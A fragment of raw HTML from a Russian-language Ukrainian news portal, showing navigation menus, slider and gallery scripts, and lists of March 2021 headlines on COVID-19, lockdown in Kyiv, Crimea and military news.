href="https://enovosty.com/news_abroad">Мир</a></li><li><a href="https://enovosty.com/news_sport">Cпорт</a></li><li><a href="https://enovosty.com/news-culture">Культура</a></li><li><a href="https://enovosty.com/news-auto">Авто</a></li><li><a href="https://enovosty.com/news_incidents">Происшествия</a></li><li><a href="https://enovosty.com/news_technology">Наука и технологии</a></li><li><a href="https://enovosty.com/zdorove">Здоровье</a></li></ul></li><li><a href="https://enovosty.com/politika">Политика</a></li><li><a href="https://enovosty.com/ekonomika">Экономика</a></li><li><a href="https://enovosty.com/finance">Финансы</a></li><li><a href="https://enovosty.com/markets">Рынки</a></li><li><a href="https://enovosty.com/society">Общество</a></li><li><a href="https://enovosty.com/tehnologii">Технологии</a></li><li><a href="https://enovosty.com/auto">Авто</a></li><li ><a href="https://enovosty.com/blogs">Мнения</a></li><li ><a href="https://enovosty.com/person">Досье</a></li><li id="menu-item-4513425_old" ><a href="https://enovosty.com/currency-rates">Курсы валют</a></li><li id="menu-item-4513319" class="menu-item-has-children" style="border-right: 1px solid #fff;"><a href="#">Ещё...</a><ul class="sub-menu"><li><a href="https://enovosty.com/o-proekte">О проекте</a></li><li><a href="https://enovosty.com/author">Авторы</a></li><li><a href="https://enovosty.com/photo-nedeli">Фото недели</a></li><li><a href="https://enovosty.com/presidenty-2019">Кандидаты в президенты 2019</a></li><li><a href="https://enovosty.com/vybory-2019" >Выборы 2019</a></li></ul></li><li id="menu-item-4513417" ><a href="https://enovosty.com/specproekty/rynok-zemli">Рынок земли</a></li><li id="menu-item-4513417" ><a href="https://enovosty.com/tag/COVID-19">COVID-19</a></li></ul></div><script>jQuery(document).ready(function($){if(jQuery( window ).width() < 606){var touchHover = function() {$('.first').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});$('.finance').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});};$(document).ready(function() { touchHover(); });}});</script> </div>  <div id="body"><div class="cls"></div><div id="sidebarLeft_n" style="width:210px;"><script>jQuery(document).ready(function($){$('#slider').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><div class="topnews_single slide"><p style="padding: 0 7px;
font-weight: 700;
font-family: arial,verdana,tahoma;
background: url(/wp-content/themes/eizvestia/img/blueline.jpg) repeat-x;
line-height: 9px;
margin: 2px 0 9px;
text-align: center;"><a href="https://enovosty.com/top-news"><span style="background-color: #fff;
font-size: 12px;
color: #326698;
text-transform: uppercase;
padding: 0 9px;">Топ-новости &nbsp;&nbsp;<i style="font-size: 11px;color: #666;font-style: normal;text-transform: none;">за 24 часа</i></span></a></p><ul id="slider"><li><ul class="tact"><li id="li0" style="width:210px;"><a href="https://enovosty.com/zdorove/full/2003-v-kieve-nachnut-rabotu-novye-punkty-vakcinacii-ot-covid-19-kto-smozhet-poluchit-privivki" title="В Киеве начнут работу новые пункты вакцинации от COVID-19: кто сможет получить прививки"><img width="210" height="156" alt="В Киеве начнут работу новые пункты вакцинации от COVID-19: кто сможет получить прививки" src="https://enovosty.com/wp-content/uploads/2021/03/f84301b2d0538dedc6d73a17cb0e8e36be200b2e-e1616266183872.jpg"></a><a href="https://enovosty.com/zdorove/full/2003-v-kieve-nachnut-rabotu-novye-punkty-vakcinacii-ot-covid-19-kto-smozhet-poluchit-privivki" title="В Киеве начнут работу новые пункты вакцинации от COVID-19: кто сможет получить прививки" class="name">В Киеве начнут работу новые пункты вакцинации от COVID-19: кто сможет получить прививки <span>(2404)</span></a></li></ul></li><li><ul class="tact"><li id="li1" style="width:210px;"><a href="https://enovosty.com/news_society/full/2003-verxovnaya-rada-ne-podderzhala-otmenu-perevoda-chasov-na-letnee-vremya" title="Верховная Рада не поддержала отмену перехода на летнее время: когда переводить часы"><img width="210" height="156" alt="Верховная Рада не поддержала отмену перехода на летнее время: когда переводить часы" src="https://enovosty.com/wp-content/uploads/2021/03/11-e1616181639698.jpeg"></a><a href="https://enovosty.com/news_society/full/2003-verxovnaya-rada-ne-podderzhala-otmenu-perevoda-chasov-na-letnee-vremya" title="Верховная Рада не поддержала отмену перехода на летнее время: когда переводить часы" class="name">Верховная Рада не поддержала отмену перехода на летнее время: когда переводить часы <span>(5195)</span></a></li></ul></li><li><ul class="tact"><li id="li2" style="width:210px;"><a href="https://enovosty.com/news_abroad/full/1903-eks-posol-ssha-makfol-predlozhil-rossii-vernutsya-k-granicam-18-veka-i-otdat-kitayu-primorskij-kraj" title="Экс-посол США Макфол предложил России вернуться к границам 18 века и отдать Китаю Приморский край"><img width="210" height="156" alt="Экс-посол США Макфол предложил России вернуться к границам 18 века и отдать Китаю Приморский край" src="https://enovosty.com/wp-content/uploads/2021/03/foto.jpg"></a><a href="https://enovosty.com/news_abroad/full/1903-eks-posol-ssha-makfol-predlozhil-rossii-vernutsya-k-granicam-18-veka-i-otdat-kitayu-primorskij-kraj" title="Экс-посол США Макфол предложил России вернуться к границам 18 века и отдать Китаю Приморский край" class="name">Экс-посол США Макфол предложил России вернуться к границам 18 века и отдать Китаю Приморский край <span>(14468)</span></a></li></ul></li><li><ul class="tact"><li id="li3" style="width:210px;"><a href="https://enovosty.com/news_society/full/1903-ukraina-voshla-v-5-ku-stran-evropy-po-kolichestvu-novyx-zarazhenij-covid-19" title="Украина вошла в 5-ку стран Европы по количеству новых заражений COVID-19"><img width="210" height="156" alt="Украина вошла в 5-ку стран Европы по количеству новых заражений COVID-19" src="https://enovosty.com/wp-content/uploads/2021/03/virus.jpg"></a><a href="https://enovosty.com/news_society/full/1903-ukraina-voshla-v-5-ku-stran-evropy-po-kolichestvu-novyx-zarazhenij-covid-19" title="Украина вошла в 5-ку стран Европы по количеству новых заражений COVID-19" class="name">Украина вошла в 5-ку стран Европы по количеству новых заражений COVID-19 <span>(1840)</span></a></li></ul></li><li><ul class="tact"><li id="li4" style="width:210px;"><a href="https://enovosty.com/news_economy/full/1903-v-ukraine-povysyat-pensionnyj-vozrast-i-sdelayut-pereraschet-pensij-podrobnosti" title="В Украине повысят пенсионный возраст и сделают перерасчет пенсий: подробности"><img width="210" height="156" alt="В Украине повысят пенсионный возраст и сделают перерасчет пенсий: подробности" src="https://enovosty.com/wp-content/uploads/2021/03/pensii-e1616139769143.jpg"></a><a href="https://enovosty.com/news_economy/full/1903-v-ukraine-povysyat-pensionnyj-vozrast-i-sdelayut-pereraschet-pensij-podrobnosti" title="В Украине повысят пенсионный возраст и сделают перерасчет пенсий: подробности" class="name">В Украине повысят пенсионный возраст и сделают перерасчет пенсий: подробности <span>(2944)</span></a></li></ul></li></ul></div><div class="wiget simple_pr" id="photoPromo" style="background: #ffe3c8;"><div class="caption"><p style=" text-transform: uppercase; font-weight: 700; font-family: arial,verdana,tahoma; margin: 0; display: block; float: left; color: #fff; padding: 0 5px 0 4px; background-color: #f93; height: 17px; font-size: 12px;
"><a style="color: #fff;" href="https://enovosty.com/photo-nedeli">Фото недели</a></p></div><div class="topnews_single slide gallery2" style="width: 168px; height: 230px; padding: 10px 10px 0; background: #fff; margin: 10px;"><ul id="slider_gallery2"><li><ul class="tact"><li id="li0" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=624&pid=13326" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/gross/thumbs/thumbs_01.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Самая красивая высокогорная дорога в мире"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=624&pid=13326" title="Самая красивая высокогорная дорога в мире" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Самая красивая высокогорная дорога в мире</a></li></ul></li><li><ul class="tact"><li id="li1" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=629&pid=13420" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/zdaniya/thumbs/thumbs_scarselli01.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Головокружительные здания Стефано Скарселли"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=629&pid=13420" title="Головокружительные здания Стефано Скарселли" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Головокружительные здания Стефано Скарселли</a></li></ul></li><li><ul class="tact"><li id="li2" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=627&pid=13384" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/nider/thumbs/thumbs_aslaksen04.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Живописные пейзажи Норвегии"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=627&pid=13384" title="Живописные пейзажи Норвегии" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Живописные пейзажи Норвегии</a></li></ul></li><li><ul class="tact"><li id="li3" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=634&pid=13501" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/vid_orbita/thumbs/thumbs_00.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Вид с орбиты на нашу планету"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=634&pid=13501" title="Вид с орбиты на нашу планету" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Вид с орбиты на нашу планету</a></li></ul></li></ul></div> <div class="cls"></div> <a href="https://enovosty.com/photo-nedeli" class="readMore">Все фото &raquo;</a></div><script>jQuery(document).ready(function($){$('#slider_gallery2').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><style>.topnews_single.gallery2 div.anythingSlider-minimalist-round span.arrow{height:160px}</style><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption" style=""><p style="font-size: 12px; height: 17px; color: #fff; background-color: #346796; padding: 0 5px; display: inline; text-transform: uppercase; font-weight: 700;font-family: arial,verdana,tahoma;">Новости общества</p></div><div class='cls'></div><span class='news_date'>20.03.2021 г.</span><br /><div class="post_news"><span id="post-4837426"><span class="postDate">20:59</span><a class="postTitle" href="https://enovosty.com/news_society/full/2003-pes-ustroivshij-nastoyashhee-predstavlenie-chtoby-ugovorit-xozyaina-pogulyat-s-nim-stal-zvezdoj-seti-video">Пес, устроивший настоящее представление с танцами, стал звездой Сети (ВИДЕО)</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4837463"><span class="postDate">20:45</span><a class="postTitle" href="https://enovosty.com/news_society/full/2003-storonniki-sternenko-oblili-ofis-prezidenta-kraskoj-razbili-stekla-i-zazhgli-faery-foto">Сторонники Стерненко облили Офис президента краской, разбили стекла и зажгли фаеры (ФОТО)</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4837430"><span class="postDate">15:39</span><a class="postTitle" href="https://enovosty.com/news_society/full/2003-pervyj-den-lokdauna-v-kieve-v-marshrutkax-gusto-v-trc-pusto-foto">Первый день локдауна в Киеве: в маршрутках - густо, в ТРЦ - пусто (ФОТО)</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4837428"><span class="postDate">15:30</span><a class="postTitle" href="https://enovosty.com/news_society/full/2003-kurez-video-kortezha-zelenskogo-aktivno-obsuzhdayut-v-seti">Курьез: видео кортежа Зеленского активно обсуждают в сети</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4837406"><span class="postDate">14:12</span><a class="postTitle" href="https://enovosty.com/news_society/full/2003-v-chernoe-more-napravilsya-eshhe-odin-raketnyj-esminec-vms-ssha">В Черное море направился еще один ракетный эсминец ВМС США</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4837369"><span class="postDate">10:50</span><a class="postTitle" href="https://enovosty.com/news_society/full/2003-verxovnaya-rada-ne-podderzhala-otmenu-perevoda-chasov-na-letnee-vremya">Верховная Рада не поддержала отмену перехода на летнее время: когда переводить часы</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4837347"><span class="postDate">09:00</span><a class="postTitle" href="https://enovosty.com/news_society/full/2003-sinoptiki-rasskazali-kogda-v-ukrainu-pridet-vesna">Синоптики рассказали, когда в Украину придет весна</a><br /><div class="postFields"></div></span></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/news_society">Все новости общества</a></div><div class="wiget simple_line analitika"> <div class="caption"><p style="text-transform: uppercase;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;"><a href="https://enovosty.com/articles">Аналитика</a></p></div><div class="block"><div class="info"><span class="postDate">19.03.2021</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/1903-godovshhina-okkupacii-kryma-rossiej-kak-ukraina-namerena-vozvrashhat-ukradennoe">Годовщина оккупации Крыма Россией: как Украина намерена возвращать украденное</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/1903-godovshhina-okkupacii-kryma-rossiej-kak-ukraina-namerena-vozvrashhat-ukradennoe"><img width="230" alt="Годовщина оккупации Крыма Россией: как Украина намерена возвращать украденное" src="/wp-content/uploads/2021/03/picturepicture_160743740286299807325647_35814.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/1903-godovshhina-okkupacii-kryma-rossiej-kak-ukraina-namerena-vozvrashhat-ukradennoe">18 марта 2014 года президент Российской Федерации (РФ) Владимир Путин подписал с самопровозглашенным «руководством» АР Крым и Севастополя договор о ...</a></span></div><div class="block"><div class="info"><span class="postDate">15.03.2021</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/1503-roman-bezsmertnij-vzhivayuchi-kroki-na-blokuvannya-dostovirnoi-informacii-pro-podii-na-fronti-nove-politichne-kerivnictvo-ukraini-faktichno-nanosilo-shkodu-zsu">Роман Безсмертний: Вживаючи кроки на блокування достовірної інформації про події на фронті, нове політичне керівництво України фактично наносило шкоду ЗСУ</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/1503-roman-bezsmertnij-vzhivayuchi-kroki-na-blokuvannya-dostovirnoi-informacii-pro-podii-na-fronti-nove-politichne-kerivnictvo-ukraini-faktichno-nanosilo-shkodu-zsu"><img width="230" alt="Роман Безсмертний: Вживаючи кроки на блокування достовірної інформації про події на фронті, нове політичне керівництво України фактично наносило шкоду ЗСУ" src="/wp-content/uploads/2021/03/aae9298-bezsmertniy.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/1503-roman-bezsmertnij-vzhivayuchi-kroki-na-blokuvannya-dostovirnoi-informacii-pro-podii-na-fronti-nove-politichne-kerivnictvo-ukraini-faktichno-nanosilo-shkodu-zsu">Офіційний Київ та керівництво окупованих РФ Луганської та Донецької псевдо-республік звинувачують один одного в підготовці провокацій і подальшому відновленні ...</a></span></div><div class="block"><div class="info"><span class="postDate">14.03.2021</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/ekonomika/full/1403-elektrotyazhmash-yarkij-primer-razvala-energeticheskogo-mashinostroeniya-ukrainy">Электротяжмаш как пример развала энергетического машиностроения Украины</a></p><div class="cblock"><a href="https://enovosty.com/ekonomika/full/1403-elektrotyazhmash-yarkij-primer-razvala-energeticheskogo-mashinostroeniya-ukrainy"><img width="230" alt="Электротяжмаш как пример развала энергетического машиностроения Украины" src="/wp-content/uploads/2021/03/22104685-1699048113459355-8586003664560322881-o-cover-medium.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/ekonomika/full/1403-elektrotyazhmash-yarkij-primer-razvala-energeticheskogo-mashinostroeniya-ukrainy">Протесты на харьковском предприятии "Электротяжмаш" из-за невыплаты зарплат заставили в очередной раз вернуться к катастрофической ситуации в промышленности ...</a></span></div></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption"><p style="font-weight: 700; font-family: arial,verdana,tahoma; font-size: 12px; text-transform: uppercase; margin: 0; padding: 0; text-align: left;height: 17px;"><a href="https://enovosty.com/news/">Последние новости</a></p></div><div class='cls'></div><span class='news_date'>20.03.2021 г.</span><br /><div class="post_news"> <span id="post-4837385"> <span class="postDate">22:00</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/2003-dlya-armii-ssha-moderniziruyut-bespilotnyj-samolet-shadow">Для армии США модернизируют беспилотный самолет Shadow</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837463"> <span class="postDate">20:45</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2003-storonniki-sternenko-oblili-ofis-prezidenta-kraskoj-razbili-stekla-i-zazhgli-faery-foto">Сторонники Стерненко облили Офис президента краской, разбили стекла и зажгли фаеры (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837462"> <span class="postDate">19:02</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2003-mid-ukrainy-nazval-ukaz-putina-o-vladelcax-zemel-v-krymu-yuridicheski-nichtozhnym">МИД Украины назвал указ Путина о владельцах земель в Крыму юридически ничтожным</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837461"> <span class="postDate">18:53</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2003-predstavitel-voz-ocenila-perspektivy-vozobnovleniya-mezhdunarodnogo-turizma">Представитель ВОЗ оценила перспективы возобновления международного туризма</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837328"> <span class="postDate">17:45</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/1903-top-luchshix-snimkov-sdelannyx-na-smartfon-foto">Лучшие фото международного конкурса мобильной фотографии (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837436"> <span class="postDate">17:09</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2003-v-mire-sdelali-bolee-420-mln-privivok-ot-koronavirusa-iz-nix-v-ukraine-93-tys-statistika">В мире сделали более 420 млн прививок от коронавируса, из них в Украине 93 тыс. - статистика</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837430"> <span class="postDate">15:39</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2003-pervyj-den-lokdauna-v-kieve-v-marshrutkax-gusto-v-trc-pusto-foto">Первый день локдауна в Киеве: в маршрутках - густо, в ТРЦ - пусто (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837428"> <span class="postDate">15:30</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2003-kurez-video-kortezha-zelenskogo-aktivno-obsuzhdayut-v-seti">Курьез: видео кортежа Зеленского активно обсуждают в сети</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837420"> <span class="postDate">15:30</span> <a class="postTitle" href="https://enovosty.com/news_sport/full/2003-olimpijskie-igry-2021-prinyato-novoe-revolyucionnoe-reshenie">Олимпийские игры-2021: принято новое революционное решение</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837412"> <span class="postDate">15:02</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2003-v-sisteme-aviabezopasnosti-i-grazhdanskoj-zashhity-mvd-zadejstvuyut-vertolety-airbus-mi-8-i-samolety-antonov-avakov">В системе авиабезопасности и гражданской защиты МВД задействуют вертолеты Airbus, Ми-8 и самолеты "Антонов" - Аваков</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837414"> <span class="postDate">14:58</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/2003-v-islandii-nachalos-izverzhenie-vulkana-vpechatlyayushhie-kadry-foto">В Исландии началось извержение вулкана: впечатляющие кадры (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837411"> <span class="postDate">14:26</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2003-v-kieve-nachnut-rabotu-novye-punkty-vakcinacii-ot-covid-19-kto-smozhet-poluchit-privivki">В Киеве начнут работу новые пункты вакцинации от COVID-19: кто сможет получить прививки</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837406"> <span class="postDate">14:12</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2003-v-chernoe-more-napravilsya-eshhe-odin-raketnyj-esminec-vms-ssha">В Черное море направился еще один ракетный эсминец ВМС США</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837410"> <span class="postDate">14:08</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/2003-sud-arestoval-imushhestvo-i-akcii-predpriyatiya-motor-sich-sbu">Суд арестовал имущество и акции предприятия "Мотор Сич" - СБУ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837356"> <span class="postDate">12:57</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/2003-ukrainskaya-pochtovaya-marka-zanyala-prizovoe-mesto-na-konkurse-luchshaya-pochtovaya-marka-evropy-2020">Фото дня: Украинская почтовая марка заняла призовое место на конкурсе "Лучшая почтовая марка Европы 2020"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837372"> <span class="postDate">12:30</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/2003-dlya-amerikanskix-vvs-predstavili-koncept-istrebitelya-budushhego-kotoryj-mozhet-zanyat-mesto-f-16-foto">Для американских ВВС представили концепт истребителя будущего, который может занять место F-16 (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837362"> <span class="postDate">11:45</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2003-uchenye-opredelili-kak-temp-xodby-vliyaet-na-techenie-covid-19">Ученые определили, как темп ходьбы влияет на течение COVID-19</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837403"> <span class="postDate">11:07</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/2003-xolodnaya-vojna-ssha-atakuyut-kitajskix-texnogigantov">Холодная война: США атакуют китайских техногигантов</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837369"> <span class="postDate">10:50</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2003-verxovnaya-rada-ne-podderzhala-otmenu-perevoda-chasov-na-letnee-vremya">Верховная Рада не поддержала отмену перехода на летнее время: когда переводить часы</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837397"> <span class="postDate">10:30</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2003-tretya-volna-sovid-19-vo-francii-parizhane-massovo-pokidayut-gorod-protyazhennost-probok-400-km">Третья волна СOVID-19 во Франции: парижане массово покидают город, протяженность пробок 400 км</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837359"> <span class="postDate">10:20</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/2003-v-ukraine-mogut-polnostyu-zapretit-vvoz-avto-s-dvs">В Украине могут полностью запретить ввоз авто с ДВС</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837394"> <span class="postDate">10:16</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2003-vperedi-nas-zhdet-dostatochno-napryazhennaya-situaciya-stepanov">Впереди нас ждет достаточно напряженная ситуация, - Степанов</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837393"> <span class="postDate">10:12</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2003-kitajskie-shpiony-nacelilis-na-nato-v-estonii-zavershilsya-neobychnyj-sudebnyj-process">Китайские шпионы нацелились на НАТО: в Эстонии завершился необычный судебный процесс</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837392"> <span class="postDate">09:51</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2003-snbo-ukrainy-vvel-sankcii-protiv-azarova-pshonki-tabachnika-i-drugix-soratnikov-yanukovicha">СНБО Украины ввел санкции против Азарова, Пшонки, Табачника и других соратников Януковича</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837352"> <span class="postDate">09:40</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/2003-v-nebo-vpervye-podnyalsya-poslednij-iz-krupnejshix-avialajnerov">В небо впервые поднялся последний из крупнейших авиалайнеров</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837391"> <span class="postDate">09:36</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2003-negativnyj-pcr-test-stanet-usloviem-vezda-v-ukrainu-dlya-inostrancev-glava-minzdrava">Негативный ПЦР-тест станет условием въезда в Украину для иностранцев, - глава Минздрава</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837365"> <span class="postDate">09:07</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/2003-ukraina-snizila-eksport-zernovyx-na-227">Украина снизила экспорт зерновых на 22,7%</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837349"> <span class="postDate">09:05</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2003-uchenye-vyyasnili-kto-bolshe-vsex-riskuet-povtorno-zarazitsya-covid-19">Ученые выяснили, кто больше всех рискует повторно заразиться COVID-19</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837347"> <span class="postDate">09:00</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2003-sinoptiki-rasskazali-kogda-v-ukrainu-pridet-vesna">Синоптики рассказали, когда в Украину придет весна</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837342"> <span class="postDate">08:15</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2003-kurez-muzej-voskovyx-figur-v-texase-ubral-statuyu-trampa-po-neobychnoj-prichine">Курьез: Музей восковых фигур в Техасе убрал статую Трампа по необычной причине</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837284"> <span class="postDate">07:20</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/2003-kitajskaya-armiya-vvela-v-ekspluataciyu-novyj-tip-boevoj-mashiny-pexoty">Китайская армия ввела в эксплуатацию новый тип боевой машины пехоты</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837332"> <span class="postDate">07:00</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2003-top-7-samyx-zhivopisnyx-ugolkov-na-planete-foto">ТОП-7 самых живописных уголков на планете (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>19.03.2021 г.</span><br /><div class="post_news"> <span id="post-4837224"> <span class="postDate">23:52</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1903-bezstrashna-ta-lirichna-v-ukraini-vitayut-vidatnu-poetesu-linu-kostenko-z-dnem-narodzhennya">"Безстрашна та лірична": В Україні вітають видатну поетесу Ліну Костенко з днем народження</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837276"> <span class="postDate">22:30</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/1903-armiya-ssha-predstavila-pervyj-element-svoej-budushhej-sistemy-giperzvukovogo-oruzhiya">Армия США представила первый элемент своей будущей системы гиперзвукового оружия</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837382"> <span class="postDate">21:59</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1903-ukraina-ozhidaet-uskoreniya-integracii-s-es-shmygal">Украина ожидает ускорения интеграции с ЕС, - Шмыгаль</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837376"> <span class="postDate">21:48</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1903-zelenskij-prizval-mestnye-vlasti-podderzhat-grazhdan-i-biznes">Зеленский призвал местные власти поддержать граждан и бизнес (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837363"> <span class="postDate">20:58</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1903-vsu-poluchat-bronetransportery-btr-4em">ВСУ получат бронетранспортеры БТР-4ЭМ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837353"> <span class="postDate">20:39</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/1903-v-snbo-anonsirovali-provedenie-zasedaniya-otnositelno-vvedeniya-lokdauna-v-ukraine">В СНБО сообщили о заседании относительно введения локдауна в Украине</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837346"> <span class="postDate">20:24</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1903-stepanov-sdelal-vazhnoe-zayavlenie-po-vezdu-na-territoriyu-ukrainy">Степанов сделал важное заявление по въезду на территорию Украины</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4837344"> <span class="postDate">19:49</span> <a class="postTitle" 